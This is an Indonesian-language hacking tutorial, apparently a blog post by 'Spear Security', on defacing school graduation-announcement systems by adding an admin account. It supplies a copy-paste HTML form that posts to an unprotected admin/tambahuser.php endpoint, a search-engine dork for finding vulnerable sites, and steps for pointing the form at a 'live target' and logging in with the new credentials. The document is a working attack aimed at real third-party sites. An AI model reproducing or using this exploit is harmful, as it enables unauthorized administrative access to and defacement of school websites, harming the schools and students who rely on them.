Yow Whatsapp guys,
Wellcome back with me.
 Kali ini kita akan membahas cara deface sistem kelulusan add admin, sama kyk cbt v2.8 add admin xixi..

Bahan bahan :
1.Kouta :v
2.Csrf :
Kalian copas aja..
<html>
<body>
<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/iQjtQvHwi4c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
 Dork : intext:"Selamat datang di Sistem"
Author : Spear Security

Pertama kalian copy dan paste ke file csrf.html.
Kedua, ganti localhostnya jadi live target kalian.
Kalian masukan user dan password terserah kaliankalian >> klik simpan data. Jika berhasil akan seperti gambar dibawah.

Jika sudah kalian login, jika berhasil berarti vuln :D